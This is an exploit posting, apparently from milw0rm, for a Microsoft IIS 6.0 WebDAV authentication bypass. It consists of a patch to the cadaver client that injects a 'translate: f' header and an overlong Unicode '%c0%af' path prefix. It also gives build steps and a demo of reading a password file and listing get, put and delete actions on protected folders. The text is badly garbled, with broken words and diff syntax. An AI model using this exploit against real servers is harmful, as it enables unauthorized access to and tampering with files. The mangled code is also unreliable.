Microsoft IIS 6.0 WebDAV remote auth bypass exploit patch

# Blog with a detailed description: # http://www.skullsecurity.org/blog? P = 285 # And the patch itself: # http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch##> mkdir cadaver-h4x #> Cd cadaver-h4x #> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch# -- snip -- #> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz# -- snip -- #> tar xzvf cadaver-0.23.2.tar.gz # -- snip -- #> Cd cadaver-0.23.2 /#> patch-P1 <.. cadaver-0.23.2-h4x.patch # Patchi Ng file lib/neon/ne_basic.c # patching file lib/neon/ne_request.c # patching file lib/neon/ne_uri.c #>. /configure # -- snip -- #> make # -- snip -- # Now we shoshould have a patched, compiled version of cadaver, so start it # Up With the server that was identified as having a vulnerable folder # earlier: ##>. /cadaver XXX. xxx. xxx. xxx # This shoshould drop you to a "Dav:/>" prompt. now just CD into the # vulnerabl E folder and check out what's there: # Dav:/> Cd Secret # Dav:/secret/> ls # listing collection '/secret/': succeeded. # password.txt 7 May 19 10:40 # Dav:/secret/> CAT password.txt # displaying '/secret/password.txt': # Ron $ pr0ns # Dav: /secret/> # Here's a list of commands that I 've tested that work with the patched # cadaver on a vulnerable Folder: # * CD # ** ls # * move # * put # * Get # * Cat # * deletediff -Rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c --- cadaver-0.23.2/lib/neon/ne_basic.c2008-02-07 16:22:07. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_basic.c2009-05-20 16:13:46. 000000000-0500 @-402,7 + 402,7 @ value = "infinity"; break;}-ne_add_request_header (req, "depth", value); + ne_add_request_header (req, "depth", "1");} static int copy_or_move (ne_session * se SS, int is_move, int overwrite, diff-rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c --- cadaver-0.23.2/lib/neon/ne_request.c2008-01-30 05:35:52. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_request.c2009-05-20 16:35:46. 000000000-0500 @-405, 6 + 405, 7 @ "connection: Te" EOL "te: Trailers" EOL);} + ne_buffer_czappend (req-> headers, "translate: f "EOL);} int ne_accep T_always (void * userdata, ne_request * req, const ne_status * st) @-420,6 + 421,7 @ ne_request * ne_request_create (ne_session * sess, const char * method, const char * path) {+ char * path2 = ne_calloc (strlen (PATH) + 7); ne_request * Req = ne_calloc (sizeof * req); req-> session = sess; @-435,13 + 437,18 @ req-> method = ne_strdup (method); req-> method_is_head = (strcmp (method, "head") = 0 ); + If (strlen (PATH)> 2) + spri Ntf (path2, "% C % C0 % af % s", path [0], path [1], path + 2 ); + else + path2 = path; +/* only use an absoluteuri here when absolutely necessary: Some * servers can't parse them. */-If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path [0] = '/') + If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path2 [0] = '/') req-> uri = ne_concat (req-> session-> scheme ,"://", -req-> session-> server. hostport, path, null); + req-> session-> server. hostport, path2, null); else-req-> uri = ne_strdup (PATH); + req-> uri = ne_strdup (path2); {struct hook * HK; diff-rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c --- cadaver-0.23.2/lib/neon/ne_uri.c2007-12-05 05:04:47. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_uri.c2009-05-20 16:13:46. 000000000-0500 @-+ @/* 0xxx x0 X2 X4 X6 X8 xa xc Xe * // * 0x */OT, ot, OT, ot,/* 1x */OT, ot, OT, ot,-/* 2x */OT, SD, ot, Gd, SD, PC, SD, SD, PS, SD, DS, DT, FS, ++/* 2x */OT, SD, ot, Gd, SD, Al, SD, SD, SD, PS, SD, DS, DT, FS,/* 3x */DG, DG, DG, Cl, SD, ot, SD, ot, Qu,/* 4x */At, Al, al,/* 5x */Al, Al, GD, ot, Gd, ot, US, # milw0rm.com [2009-05-21]